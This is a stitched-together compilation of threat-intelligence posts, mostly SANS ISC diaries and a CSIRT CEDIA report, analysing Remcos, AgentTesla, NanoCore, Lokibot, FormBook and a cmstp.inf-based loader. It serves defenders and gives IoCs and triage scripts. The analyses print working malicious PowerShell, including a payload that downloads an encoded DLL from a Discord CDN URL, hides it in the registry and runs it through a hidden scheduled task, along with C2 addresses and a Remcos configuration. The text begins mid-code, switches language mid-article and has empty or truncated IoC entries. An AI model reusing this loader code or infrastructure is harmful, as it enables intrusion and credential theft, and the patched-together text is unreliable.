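84[.]147[.]54[.]113|p54933671[.]dip0[.]t-ipconnect[.]de|DTAG Internet service provider operations|DE|0|0
178[.]239[.]165[.]70|70[.]165[.]239[.]178[.]baremetal[.]zare[.]com|BANDWIDTH-AS|GB|1|1
195[.]74[.]76[.]222|r-222[.]76[.]74[.]195[.]ptr[.]avast[.]com|AVAST-AS-DC|CZ|0|0
104[.]18[.]12[.]38|NXDOMAIN|CLOUDFLARENET|US|0|0"""

# PTR suffixes that identify the hosting provider when the AS column is empty (assumed mapping).
PTR_PROVIDERS = {
    "bc.googleusercontent.com": "GOOGLE-CLOUD-PLATFORM",
    "compute.amazonaws.com": "AMAZON-02",
}
# AS names treated as "cloud provider" for the summary (assumed classification).
CLOUD_AS = {"GOOGLE-CLOUD-PLATFORM", "AMAZON-02", "MICROSOFT-CORP-MSN-AS-BLOCK", "CLOUDFLARENET"}


def refang(s):
    return s.replace("[.]", ".")


def parse_rows(text):
    """Turn the defanged table rows into dicts, inferring a missing AS name from the PTR."""
    records = []
    for line in text.splitlines():
        ip, ptr, asn, cc, attacks, count = line.split("|")
        ip, ptr = refang(ip), refang(ptr)
        if not asn:
            for suffix, name in PTR_PROVIDERS.items():
                if ptr.endswith(suffix):
                    asn = name
        records.append({"ip": ip, "ptr": ptr, "asn": asn or "UNKNOWN", "cc": cc,
                        "attacks": int(attacks), "count": int(count)})
    return records


def summarize(records):
    by_as = Counter(r["asn"] for r in records)
    cloud = sum(1 for r in records if r["asn"] in CLOUD_AS)
    seen = [r["ip"] for r in records if r["attacks"] > 0]
    return {"by_as": dict(by_as), "cloud_fraction": cloud / len(records), "seen_attacking": seen}


if __name__ == "__main__":
    for k, v in summarize(parse_rows(ROWS)).items():
        print(k, v)
```

The practical use of such a summary is on the defender's side: an analysis lab whose egress addresses appear in a sample's list should expect that sample, and others sharing the list, to behave differently there than on a victim host, and can plan egress accordingly.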
[1] https://www[.]virustotal[.]com/gui/file/9d4d651095f9e03a0321def2dc47252ed22334664218f3df9e2f3dbbf99cdc1b
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Actualmente las campañas de malware constituyen una amenaza significativa a nivel regional e internacional, ya que los ciberdelincuentes están adaptando sus tácticas para aprovechar las vulnerabilidades existentes, causando un gran impacto sobre la seguridad de los sistemas e infraestructuras con el desarrollo de nuevas variantes de malware, tales como AgentTesla, NanoCore, RemcosRAT, SnakeKeylogger, etc.
El panorama de la ciberseguridad está evolucionando exponencialmente, y el malware se ha convertido en una de las mayores amenazas para las organizaciones en todo el mundo. Los ciberdelincuentes continúan mejorando sus técnicas y herramientas para comprometer sistemas, robar información confidencial y causar daños significativos.
La infección por malware se ha convertido en la primera inquietud para las organizaciones en Latinoamérica, por delante del robo de información (60%) y el acceso indebido a los sistemas (56%). Así lo pone de manifiesto el ESET Security Report 2022, el informe anual que analiza el panorama de ciberseguridad en Latinoamérica.
En lo relativo al malware, la preocupación es justificada: en 2022, el 34% de los ciberincidentes que sufrieron las empresas latinoamericanas tuvo que ver con códigos maliciosos. A tenor de los datos de ESET, las organizaciones de Perú (18%) fueron las más afectadas, situándose a continuación las de México (17%), Colombia (12%), Argentina (11%) y Ecuador (9%).
A continuación, se presenta una lista de malware que se encuentra operando activamente a nivel mundial y que dispone de la capacidad de extenderse a América Latina:
AgentTesla
Agent Tesla es un malware del tipo remote access trojan (RAT) que está activo desde 2014 y que es distribuido como un Malware-as-a-Service (MaaS) en campañas a nivel global.
Este malware está desarrollado con el framework .NET y es utilizado para espiar y robar información de los equipos comprometidos, ya que cuenta con la capacidad de extraer credenciales de distintos softwares, obtener cookies de navegadores de Internet, registrar las pulsaciones del teclado de la máquina (Keylogging), así como realizar capturas de pantalla y del clipboard (portapapeles). Este código malicioso utiliza distintos métodos para el envío de la información recopilada hacia el atacante.
A su vez, se ha visto que esta amenaza puede venir incluida dentro de un empaquetador (packer) con distintas capas de ofuscación. Esto es utilizado para tratar de evadir las soluciones de seguridad y dificultar el proceso de investigación y análisis del malware. Estos empaquetadores pueden implementar distintas técnicas para obtener información de la máquina sobre la que se está ejecutando, para, por ejemplo, averiguar si es una máquina virtual o una máquina sandbox, y en caso de ser así, evitar su ejecución.
Métodos de propagación e infección
Esta amenaza suele propagarse por medio de correos electrónicos de phishing que incluyen un archivo adjunto malicioso con el cual buscan engañar al usuario que recibe el correo para hacer que descargue y ejecute este contenido. Por ejemplo, se utilizan correos de la empresa de reparto DHL, tal como se puede observar a continuación:
Fig. 1. Correo de phishing en la Operación Guinea Pig. (Fuente: welivesecurity.com)
La informalidad con la que está redactado el correo debe crear una firme sospecha. Por otro lado, es importante señalar que el archivo adjunto tiene doble extensión, .jpg.xxe, que revela que el archivo se encuentra comprimido.
Con respecto a los archivos maliciosos adjuntos, los mismos pueden variar, ya sea para engañar al usuario como también para evadir las soluciones de seguridad. Por ejemplo, pueden ser archivos comprimidos, documentos del paquete Office o un archivo ejecutable, etc.
IoC de AgentTesla
HashDescripción80F43EA09F4918F80D4F7D84FDB6973CCAADDE05PowerShell/TrojanDownloader.Agent.GNZ75ADD0E232AB4164285E7804EC5379BFA84C0714PowerShell/TrojanDownloader.Agent.GNZ64F199EDAC6B3A8B1D994B63723555B162563B32PowerShell/TrojanDownloader.Agent.GNZ1652619B5095EEA2AFEC3A03B920BF63230C8C8APowerShell/TrojanDownloader.Agent.GNZD86960DD7B093DD0F3EF1DC3BC956D57217BD4ECPowerShell/TrojanDownloader.Agent.GNZ9754596E9E8B0A6E053A4988CF85099C2617A98BMSIL/TrojanDownloader.Agent.NEN1ECA09DC9001A0B6D146C01F5B549DD96A0BFE5DMSIL/Spy.AgentTesla.F
Dominios e IPs detectados en muestrashttps[:]//firebase[.]ngrok[.]ioftp[.]sisoempresarialsas.com195[.]178.120.243[.]22.30.4051[.]161.116.202
NanoCore
El troyano de acceso remoto (RAT) NanoCore se descubrió por primera vez en 2013, teniendo una amplia variedad de funciones como keylogger. Además, tiene la capacidad de manipular y observar a través de cámaras web, bloqueo de pantalla, descarga y robo de archivos, etc.
El actual NanoCore RAT se está propagando a través de una campaña de malware que utiliza ingeniería social en la que el correo electrónico contiene un recibo de pago bancario falso y una solicitud de presupuesto. Los correos electrónicos también contienen archivos adjuntos maliciosos con extensión .img o .iso, los cuales son utilizados para almacenar volcados sin procesar de discos magnéticos o discos ópticos.
Fig. 2. Correo de phishing con archivo adjunto infectado con NanoCore. (Fuente: welivesecurity.com)
Otra versión de NanoCore también se distribuye en campañas de phishing mediante un archivo ZIP especialmente diseñado para eludir las herramientas de correo electrónico seguras. El archivo ZIP malicioso puede ser extraído por ciertas versiones de PowerArchiver, WinRar y el antiguo 7-Zip. La información robada se envía a los servidores de comando y control (C&C) del atacante del malware.Esta RAT recopila los siguientes datos y los envía a sus servidores:
Credenciales de correo electrónico de clientes de correo populares.
Nombres de usuario y contraseñas del navegador.
Información de cuentas almacenadas de clientes de protocolo de transferencia de archivos (FTP) o software de gestión de archivos.
Impacto:
Comprometer la seguridad del sistema utilizando sus capacidades de puerta trasera para ejecutar comandos maliciosos.
Violación de la privacidad del usuario mediante la recopilación de credenciales de usuario, registrando pulsaciones de teclas y robando información sensible.
IoC de NanoCore
TipoIoCFileHash14e0cf11ec1913e7474c170ca9bfc3b7c739dfb4FileHash8ab96a03abd7f1de37ad67e7d7336ad3f4ac2433FileHashdf91988bd511978777677d476736682fFileHashbfb464624e77cd6469df2eda0a2962a6FileHashb0a39fb6cf64eb83c6b7055d7f645c9aFileHashaee72977f81a3be62e3039cc79c688b9FileHashf34d5f2d4577ed6d9ceec516c1f5a744FileHash4b6fb5ab17ca6ffa768c4ad63571f547URLhttp://93.184.220.29:80Dominiocobind.comFileHash2a2e1ab68249e6152a30c3dbaa6e4d56996aadef455a796aae5fc202c1831936FileHash3f611c21ac35512e1fb39d244a9f2b274258fb28a06e4cab93f9af15df0433d8URLhttps://hydramecs.com/NA.exeURLttps://45.12.253.105/NA.exeIP168.119.0.173IP152.89.218.40IP104.168.65.245
RemcosRAT
El software Remcos, comercializado como un software legítimo por la empresa alemana Breaking Security para gestionar remotamente sistemas Windows, es ahora ampliamente utilizado en múltiples campañas maliciosas por parte de actores de amenazas. Remcos es un sofisticado troyano de acceso remoto (RAT) que puede utilizarse para controlar y vigilar por completo cualquier ordenador con Windows a partir de XP.
La campaña actual utiliza una técnica de ingeniería social en la que las amenazas aprovechan las novedades y tendencias mundiales. Por ejemplo, el correo electrónico de phishing contiene un PDF que ofrece medidas de seguridad contra el CoronaVirus, pero en realidad este PDF incluye un ejecutable para un dropper REMCOS RAT que se ejecuta junto con un archivo VBS que ejecuta el malware. El malware también añade una clave de registro de inicio en «HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce» para que sea persistente mientras se reinicia el dispositivo afectado.
Este Backdoor recopila la siguiente información y la envía a sus servidores:
Información del ordenador (versión del SO, nombre del ordenador, tipo de sistema, nombre del producto, adaptador principal).
Información del usuario (acceso del usuario, perfil del usuario, nombre del usuario, dominio del usuario).
Información del procesador (número de revisión del procesador, nivel del procesador, identificador del procesador, arquitectura del procesador).
A continuación, se presenta un ejemplo de un intento de phishing con un documento adjunto que en realidad esconde archivos ejecutables:
Fig. 3. Correo de phishing con archivo adjunto infectado con RemcosRAT. (Fuente: success.trendmicro.com)
Aunque Breaking Security promete que el programa solo está disponible para aquellos que pretendan utilizarlo con fines legales, en realidad, Remcos RAT ofrece a los clientes todas las funciones necesarias para lanzar ataques potencialmente destructivos. El malware se puede adquirir con diferentes criptodivisas.
IoC de RemcosRAT
TipoIoCHASH6d25e04e66cccb61648f34728af7c2f2HASHF331c18c3f685d245d40911d3bd20519HASH8cea687c5c02c9b71303c53dc2641f03DOMINIOhttp[:]//geoplugin.net/json.gpDOMINIOfalimore001[.]hopto.orgIP178[.]237.33.50IP194[.]147.140.29
SnakeKeylogger
Snake Keylogger es una variante de malware peligrosa que puede dar lugar a una violación de datos u otro incidente de ciberseguridad importante en una organización. Este malware es actualmente una de las principales variantes, convirtiendose, según la entidad de ciberseguridad Checkpoint, en la segunda más común en 2022. Sin embargo, es solo una de las ciberamenazas a las que se enfrentan las organizaciones. Como sucede con esta familia de herramientas utilizada por la ciberdelincuencia, su función es registrar las pulsaciones en los teclados de los usuarios y transmitir los datos recogidos a los ciberdelincuentes.
Mediante un análisis desarrollado por la misma entidad, se ha observado que Snake Keylogger reúne varias tácticas de evasión escurridizas. Hace ingeniería social con sus víctimas, se dirige a organizaciones/usuarios que no han parcheado un exploit conocido, y utiliza una variedad de giros y vueltas en un esfuerzo por evadir los productos antivirus (AV) tradicionales.
En una reciente campaña de amenazas, Snake Keylogger se distribuyó mediante un downloader que utiliza un tipo de archivo poco convencional como señuelo, además de utilizar archivos incrustados dentro de ese señuelo, shellcode cifrado y exploits de ejecución remota de código. Debido a la familiaridad del público con los formatos de Microsoft Office, los archivos DOC y XLS tienden a ser los documentos señuelo elegidos por los actores de amenazas. Por ello, es mucho menos frecuente ver un archivo PDF como el utilizado por esta amenaza como vector inicial de un ataque.
Mecanismo de infección y operación
HP Wolf Security recently discovered this threat when it came across an attached PDF file named "REMMITANCE INVOICE.pdf". When this file is run, the user is prompted to open a DOCX file whose misleading name is "ha sido verificado. Sin embargo, PDF, Jpeg, xlsx, .docx" ("has been verified. However, PDF, Jpeg, xlsx, .docx"). This strange file name was chosen for a specific reason: at a glance, it makes it look as though the file had been automatically scanned and verified by the victim's machine, as shown below.
Fig. 4. Message displayed after opening "REMMITANCE INVOICE.pdf". (Source: blogs.blackberry.com)
This is a type of social engineering that relies heavily on the victim only glancing at the pop-up window. The threat actor hopes the victim is too busy or distracted to read the "Open file" dialog properly, which means that many people working in a fast-paced office environment could fall victim to this threat.
If this DOCX file is opened and the victim enables macros, the download of an RTF file is triggered while the oddly named document is displayed in Microsoft Word. Observant users will also notice that Word reaches out to a particular URL while loading, as shown in Figure 5, coinciding with DNS requests for the same URL.
Fig. 5. URL generated when opening the file in Word. (Source: blogs.blackberry.com)
Once the shellcode in the RTF file downloads the keylogger, Snake Downloader has done its job and Snake Keylogger takes over from there. Keyloggers such as Snake lurk in the background on an infected machine and wait for the user to type in any juicy information, in particular website logins such as those used for banking or a cryptocurrency wallet. That information is exfiltrated back to the threat actors and used for their own financial gain.
So although it may be less common to see PDFs used as malicious attachments, they should still be treated with the same seriousness and handled with the same precautions as any other potentially infected attachment. In the case of Snake Downloader, the decoy document is only the first step in a series of tactics used to hide the installation of the Snake Keylogger payload.
Snake Keylogger IoCs
Lokibot
Lokibot, also known as Loki PWS or Loki-bot, is malware belonging to the trojan family that has been active since 2015 and has been used in global campaigns ever since. It was designed to steal credentials from browsers, FTP/SSH clients, messaging systems and even cryptocurrency wallets.
It was originally developed in C and advertised on underground forums and dark web marketplaces. Early versions simply targeted the theft of cryptocurrency wallets and of passwords from applications used by the victim, as well as those stored in Windows. Lokibot can also be described as Malware-as-a-Service (MaaS), that is, malware offered as a service for third parties to use. This is why it remains an attractive tool for cybercriminals, since it lets them develop their own versions of Lokibot.
Distribution methods
Lokibot spreads through phishing campaigns that include malicious attachments or embedded URLs. These attachments may be Word, Excel or PDF files, or other extensions such as .gz or .zip that pose as PDF or .txt files.
Over the years these campaigns have varied the theme used as a lure for their attachments, from an invoice to a quotation or the confirmation of a supposed order. Attackers also began sending malicious attachments with COVID-19 related themes to try to attract unsuspecting users and convince them to open an attachment in their email:
Fig. 6. Phishing email distributing Lokibot using COVID-19 as a pretext. (Source: Microsoft Security Intelligence)
Key characteristics
Lokibot is trojan-type malware that steals confidential information from compromised machines, such as usernames, passwords, cryptocurrency wallets and other data. The Lokibot payload for Windows has also been seen distributed through the exploitation of old vulnerabilities, such as CVE-2017-11882 in Microsoft Office.
Among the malware's main capabilities are deleting files, disabling system processes, and blocking the security solutions installed on the victim's device.
Lokibot is deployed through a botnet made up of compromised machines that connect to C&C (Command and Control) servers to send the data collected from the victim. Once the malware gains access to the victim's sensitive information, it exfiltrates it, commonly over HTTP. In addition, once it manages to infect the victim's device it creates a backdoor that lets cybercriminals download and install other pieces of malware.
To gain persistence on the compromised machine and keep exfiltrating information, Lokibot first modifies the registry by adding a new entry, which is stored under HKEY_LOCAL_MACHINE if the victim has administrator privileges. Otherwise, it is stored under HKEY_CURRENT_USER.
Lokibot IoCs
FormBook
Formbook is infostealer-type malware that collects and steals sensitive information from a victim's machine, such as login credentials, screenshots and other data, and then sends it to a server controlled by the cybercriminals. It has been active since 2016 and operates under the Malware-as-a-Service (MaaS) model, so it is usually sold on underground forums.
Under this service, known as MaaS, cybercriminals get, on the one hand, access to the malicious code so they can spread it to victims and, on the other, access to an administration panel where they can monitor infected machines. Spreading the malicious code is up to the cybercriminals themselves, who distribute it through their own means or by hiring a service to do it for them.
Finally, Formbook has a distinctive behaviour: it is a formgrabber. A formgrabber is a type of malware that collects the information a victim enters in a web browser, for example the credentials on a login screen, before that information is sent. It achieves this by intercepting calls to the HTTP API functions that browsers use to send information to the pages a user visits while using the browser in question.
Propagation method
This malware usually spreads through phishing emails that include an attachment or a URL that leads the victim to download the malicious code. These emails may refer to different themes, such as fake purchase orders, tax payments, transfers, or other social engineering meant to make potential victims believe the email is legitimate so they open the link or the attachment.
An example of phishing emails distributing the Formbook malware is shown below.
Fig. 7. Phishing email distributing Formbook. (Source: welivesecurity.com)
The latest reports from Check Point Research (CPR), a leading international provider of cybersecurity solutions, place this malware in first position in its latest Global Threat Index for September 2022. Formbook affects approximately 3% of organizations worldwide.
It is worth noting that in some cases Formbook has been observed wrapped in a loader with several layers of obfuscation. This is a common practice among cybercriminals to try to evade security solutions and to make investigation and analysis harder. These loaders also use various techniques to determine whether they are running in a virtual machine and to persist on the victim's machine. Finally, they have been seen modifying the access permissions on the persisted file to make its removal from the infected machine more difficult.
Mechanisms to mitigate vulnerabilities associated with any type of malware
If there is no indication that the email is malicious, check that the recipient is valid.
Do not open any email if there is reason for suspicion, whether about its content or about the person who sent it.
Do not download email attachments if you have doubts about why you received them or about anything else.
Check file extensions. For example, if a file ends in ".pdf.exe", the last extension determines the file type; in this case it would be ".exe", that is, an executable.
If an email includes a link that takes you to a page asking for your credentials, do not enter them; open the official site in another browser or tab and log in from there.
Have a periodic password-change policy.
Keep the security solutions installed on the device up to date.
Reference:
https://www.eset.com/ec/security-report/
The post Malware AgentTesla en América Latina: Análisis técnico y cómo defenderse was first published on CSIRT CEDIA.
FIN8 Group Using Modified Sardonic Malware for Deployment of BlackCat Ransomware
According to the Symantec Threat Hunter Team, the financially motivated threat actor known as FIN8 has been observed using an updated version of a malware called Sardonic to deliver the BlackCat ransomware. The update on the Sardonic malware is an attempt on the part of the e-crime group to diversify its focus and maximize profits from infected entities. [1] The C++ based Sardonic backdoor has the ability to harvest system information and execute commands, and has a plugin system designed to load and execute additional malware payloads delivered as DLLs. Unlike the previous variant of Sardonic, which was designed in C++, the latest iteration packs in significant alterations, with most of the source code rewritten in C and modified so as to deliberately avoid similarities. In the latest incident analyzed by Symantec, Sardonic malware is embedded into a PowerShell script that was deployed into the targeted system after obtaining initial access. The script is designed to launch a .NET loader, which then decrypts and executes an injector module to ultimately run the implant. Successful infection leads to the deployment of BlackCat ransomware.
I found a phishing email that delivered a password-protected RAR archive. Inside the archive, there was a simple .bat file (SHA256: 57ebd5a707eb69dd719d461e1fbd14f98a42c6c3dcb8505e4669c55762810e70) with the following name: SRI DISTRITAL – DPTO DE COBRO -SRI Informa-Deuda pendiente.bat. Its current VT score is only 1/59![1]
Let's have a look at this file! After the classic "@echo off", there is a very long line that looks like a payload. It starts with "::", which marks a comment in .bat files (a common alternative to the REM command):
The payload looks encrypted and takes up most of the file. At the end of the script, we find some code that seems obfuscated, but we can immediately spot a pattern (the human eye will always be more powerful than a computer):
The deobfuscated script reveals a piece of PowerShell that uses the same technique:
Once beautified, we have this:
This confirms our idea! The script reads and decompresses the payload from the original file (the line starting with "::"). The code reveals that the payload is split into two parts separated by a ":".
$bxDfq=[System.Linq.Enumerable]::$xRIq([System.IO.File]::$cBAX([System.IO.Path]::$UAbP([System.Diagnostics.Process]::$TkRf().$rvdd.FileName, $null)), 1);
$dfqcx=$bxDfq.Substring(2).$oVot(':');
$xlGba=aBhVu (PaVHU ([Convert]::$wYqi($dfqcx[0])));
$UiOEh=aBhVu (PaVHU ([Convert]::$wYqi($dfqcx[1])));
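As an added example (not code from the diary), here is a small Python triage script that reproduces, from the defender's side, the decoding logic of the PowerShell above: it finds the oversized "::" comment line, splits it on ":", Base64-decodes each part, decompresses it and reports the size and SHA256 of each recovered stage. The sample .bat it runs on is constructed inline, and since the diary does not name the decompression scheme used by the real dropper, gzip, raw DEFLATE and zlib are tried in turn as an assumption.

```python
"""Triage helper for .bat droppers that hide their payload in a '::' comment.

Added example, not the diary's code. It follows the decoded PowerShell:
take the second line of the file (index 1), drop the leading '::', split on
':', Base64-decode each part and decompress it. The sample dropper below is
constructed; the decompression scheme of the real one is an assumption.
"""
import base64
import gzip
import hashlib
import zlib

# Comments this long in a batch file are worth a look (constructed threshold).
LONG_COMMENT = 120

# Constructed stage contents standing in for the two real payloads.
STAGE_ONE = b"Write-Host 'stage one'\r\n" + bytes(range(256))
STAGE_TWO = b"Write-Host 'stage two'\r\n" + bytes(range(255, -1, -1))


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def find_long_comment_lines(bat_text, min_len=LONG_COMMENT):
    """Return (line_no, text) for '::' comment lines at least min_len long."""
    hits = []
    for line_no, line in enumerate(bat_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("::") and len(stripped) >= min_len:
            hits.append((line_no, stripped))
    return hits


def inflate(blob):
    """Try gzip, raw DEFLATE and zlib in turn; return None if none applies."""
    attempts = (
        gzip.decompress,
        lambda b: zlib.decompress(b, -zlib.MAX_WBITS),
        zlib.decompress,
    )
    for attempt in attempts:
        try:
            return attempt(blob)
        except (OSError, EOFError, zlib.error):
            continue
    return None


def extract_payloads(comment_line):
    """Split '::<b64>:<b64>' into decoded (and, where possible, inflated) blobs."""
    body = comment_line[2:]  # same as the script's Substring(2)
    results = []
    for part in body.split(":"):  # same as the script's Split(':')
        part = part.strip()
        if not part:
            continue
        try:
            raw = base64.b64decode(part, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            results.append({"error": "not base64", "size": len(part)})
            continue
        inflated = inflate(raw)
        data = raw if inflated is None else inflated
        results.append({
            "sha256": sha256_hex(data),
            "size": len(data),
            "decompressed": inflated is not None,
        })
    return results


def triage_bat(bat_text):
    """Report every suspicious comment line with the payloads it carries."""
    return [
        {"line": line_no, "payloads": extract_payloads(text)}
        for line_no, text in find_long_comment_lines(bat_text)
    ]


def build_sample_bat():
    """Constructed dropper: '@echo off', then the '::' line, then real commands."""
    blob = ":".join(
        base64.b64encode(gzip.compress(stage)).decode()
        for stage in (STAGE_ONE, STAGE_TWO)
    )
    return "@echo off\r\n::" + blob + "\r\necho nothing to see here\r\n"


if __name__ == "__main__":
    for entry in triage_bat(build_sample_bat()):
        print(entry)
```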
Let’s decode the two payloads with a simple Cyberchef recipe:
The two decrypted payloads are:
Payload1: ce8994715e43e82ec8eec439418ceef0fff238c661f873b069de402360bb671d
Payload2: af276f76e20bfcf9250335fe6bd895faf9c2b106a4edd23ea85594a7bd182635
Both are unknown on VT at this time.
The first payload launches a PowerShell script that implements persistence via multiple techniques, such as a scheduled task:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive uXeplsWzSa' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\uXeplsWzSa.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
The uXeplsWzSa.vbs file contains:
CreateObject("Shell.Application").ShellExecute """C:\Users\REM\AppData\Roaming\uXeplsWzSa.cmd""", "", "", "open", 2
Unfortunately, the process crashes. The .cmd file is the original .bat script. To increase the chances of making it run, I executed the script in a sandbox, and the final malware executed was 'wkx5nrg2.isx.exe' (SHA256: 42BA54142CD9E5DE5C6370F26DB8AEE6870FF8D0E4A86546E855CDF6828621AD). This one is also unknown on VT but belongs to the Remcos[2] malware family. Here is the extracted config:
{
  "c2": [
    "microsoftteams[.]con-ip[.]com:2450"
  ],
  "attr": {
    "mutex": "Rmcau1mstub-R03XGF",
    "copy_file": "remcos.exe",
    "hide_file": false,
    "copy_folder": "Remcos",
    "delete_file": false,
    "keylog_file": "logslmilo.dat",
    "keylog_flag": false,
    "audio_folder": "MicRecords",
    "install_flag": false,
    "keylog_crypt": false,
    "mouse_option": false,
    "connect_delay": "0",
    "keylog_folder": "logslilo",
    "startup_value": "\u0001",
    "screenshot_flag": false,
    "screenshot_path": "%AppData%",
    "screenshot_time": "10",
    "connect_interval": "1",
    "hide_keylog_file": true,
    "screenshot_crypt": false,
    "audio_record_time": "5",
    "screenshot_folder": "Screenshots",
    "take_screenshot_time": "5",
    "take_screenshot_option": false
  },
  "rule": "Remcos",
  "botnet": "STUB1",
  "family": "remcos"
}
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
On the 6th of July 2023, a joint advisory was published by CISA, the FBI, and CCCS (Canadian Center for Cyber Security) warning of a malware campaign actively exploiting a Remote Code Execution (RCE) vulnerability in Netwrix Auditor (CVE-2022-31199) for initial access. According to a July 2022 advisory by Bishop Fox, the security research firm … CVE-2022-31199: Truebot Malware Campaign Actively Exploiting Netwrix Auditor RCE Vulnerability
When dealing with malware analysis, you like to get “fresh meat”. Just for hunting purposes or when investigating incidents in your organization, it’s essential to have a triage process to reduce the noise and focus on really interesting files. For example, if you detect a new sample of Agent Tesla, you don’t need to take time to investigate it deeply. Just extract IOCs to share with your colleagues. From a business point of view, you don’t have time to analyze all samples!
How do you perform malware triage? It helps to have tools for this (executed from a sandbox), and there are a lot of tools for the job. Still, another critical element is "automation": your collected samples must feed a pipeline of tools that try to guess the malware family, extract the config, and so on, and why not archive and index everything? For this purpose, I'm using a local instance of mwdb[1] (MalwareDB), coupled with karton[2]. For example, I extract samples from catch-all mailboxes and send them to the triage process via the REST APIs:
Mail > MIME-Extract > mwdb > karton > Analysis modules (sandbox, YARA, …)
But sometimes you need to perform a quick manual analysis of a suspicious file, and for that you need "manual" tools. Recently, Jim (also a FOR610 instructor) found an interesting tool for this task: Qu1ckSc0pe[3]. Why is this tool interesting? It can analyze multiple types of files: Windows, Linux and OSX binaries, document files, APK files, and archive files.
Written in Python, such tools usually require a lot of third-party modules and are therefore good candidates to be run from a Docker container (to avoid polluting your core OS with a lot of files and libraries). A simple Dockerfile is provided with the tool, but I could not get a stable installation from it. So I wrote my own Dockerfile:
FROM ubuntu:22.04
MAINTAINER Xavier Mertens <xmertens@isc.sans.edu>
# Update & install required packages
RUN DEBIAN_FRONTEND=noninteractive apt update && apt -y upgrade && apt -y install sudo git python3-pip wget unzip
# Install main app
WORKDIR /app
COPY . .
# Stupid fix to allow non-interactive install
RUN sed -i "s/apt install/DEBIAN_FRONTEND=noninteractive apt -y install/g" setup.sh
RUN chmod a+x qu1cksc0pe.py setup.sh
# Another simple fix to avoid breaking the setup script
RUN ln -s /root /home/root
RUN ./setup.sh
# Missing dependencies
RUN pip3 install pycryptodome
# Install Radare2
WORKDIR /opt
RUN git clone https://github.com/radareorg/radare2
RUN radare2/sys/install.sh
WORKDIR /app
ENTRYPOINT ["/app/qu1cksc0pe.py"]
How to build the tool? First, clone the repository:
remnux@remnux:/opt$ git clone https://github.com/CYB3RMX/Qu1cksc0pe.git
Replace the existing Dockerfile with mine and build the image:
remnux@remnux:/opt/Qu1ckSc0pe$ docker build -t isc/quickscope .
Now, to use the tool, map a volume containing your samples:
Here is an example against a Word document with a VBA macro:
The Dockerfile still needs some fine-tuning (for example, a volume to keep the YARA rules updated), but it already does the job.
Qu1ckSc0pe has many more features that I did not cover here. If interested, look at the repository, which provides multiple usage examples.
[1] https://github.com/CERT-Polska/mwdb-core
Xavier Mertens (@xme)
One of our Stormcast listeners, Kevin, wrote in to share that his friend Jon had received a targeted spear-phishing e-mail. We asked for more information, and Jon kindly provided us with the corresponding e-mails and data to analyze. The spear-phishing e-mail sent to Jon masqueraded as an individual representing NordVPN (note: NordVPN had published an advisory about scammers posing as NordVPN representatives earlier this year [1]) and enquired about the possibility of a YouTube sponsorship/collaboration with his YouTube channel. I took the liberty to examine the phishing e-mail and its associated artifacts, noting the details I observed from my analysis.
Microsoft has used ".inf" files for a while[1]. They are simple text files that contain setup information for a driver package: they describe what must be done to install the driver package on a device. When you read them, the syntax is straightforward to understand. The file is organised in sections that describe what must be performed. One of them is very interesting for attackers: [RunPreSetupCommandsSection]. Note that .inf files cannot be executed "as is".
The malicious file I found has the following section:
[RunPreSetupCommandsSection] ; Commands Here will be run Before Setup Begins to install
The payload 'task.ps1' contains the following code:
$webContent = Invoke-WebRequest -Uri "hxxps://cdn[.]discordapp[.]com/attachments/1114670648028049408/1119333871213879356/get.txt"
New-Item -Path "HKCU:\Software\lath3";
Set-ItemProperty -Path "HKCU:\Software\lath3" -Name "lath2" -Force -Value $webContent.Content;
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-w hiDden $you=[Convert]::FromBase64String((gp "HKCU:\Software\lath3").lath2);[Reflection.Assembly]::Load($you);[QJAMsrpfhk.HH]::Main()'
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -RunLevel Highest Force -Trigger $trigger -TaskName "Demo" -Description "Shane"
The payload 'get.txt' contains a Base64-encoded executable that is decoded and loaded by PowerShell. It's a DLL with a VT score of 31/70 (SHA256: 15b97c5182a30d4c85b31835b44d978dc065892587a7656038575bd32a62ac32).
The PowerShell script can be categorized as "fileless" because it saves the payload in a registry value (HKCU:\Software\lath3\lath2) and creates a scheduled task for persistence. The PowerShell script is launched every time the compromised host reboots.
There is more interesting information in the .inf file:
[Strings] ServiceName="CorpVPN"
The file is called 'cmstp.inf'. cmstp.exe is a LOLbin, a tool provided by Microsoft for managing Connection Provider service profiles[2]. It can handle .inf files like this:
cmstp.exe [/nf] [/s] [/u] [drive:][path]serviceprofilefilename.inf
Here is the parent PowerShell script, named uas32.ps1 (SHA256: 20295311db1228935ddbba18678c88db78b4fc7efb54d2853cfb801851de0e19). It is obfuscated with a classic technique:
(NEw-Object MAnaGEMENt.auToMAtiON.psCreDENTIaL ' ', ( ' … <payload> … ' |coNVertTO-SEcUrEStrinG -ke (13..28))).GETNetwOrkCrEDentIal().PAsSWORD |Iex
I won't cover the complete script because it's not relevant. The interesting part is the following:
. Set-INFFile
#Needs Windows forms
add-type -AssemblyName System.Windows.Forms
If (Test-Path $InfFileLocation) {
#Command to run
$ps = new-object system.diagnostics.processstartinfo "c:\windows\system32\cmstp.exe"
$ps.Arguments = "/au $InfFileLocation"
$ps.UseShellExecute = $false
The initial script drops the file 'cmstp.inf' on disk and invokes cmstp.exe as described above. It is delivered to the victim in a CAB file (SHA256: fb4f92adc2a9c920ce9a77d1f66050c69728d1f3773c02f9da42e7809fb10d1c).
To summarize, the infection flow is:
CAB file -> uas32.ps1 -> cmstp.exe with cmstp.inf -> Scheduled task -> Malicious DLL
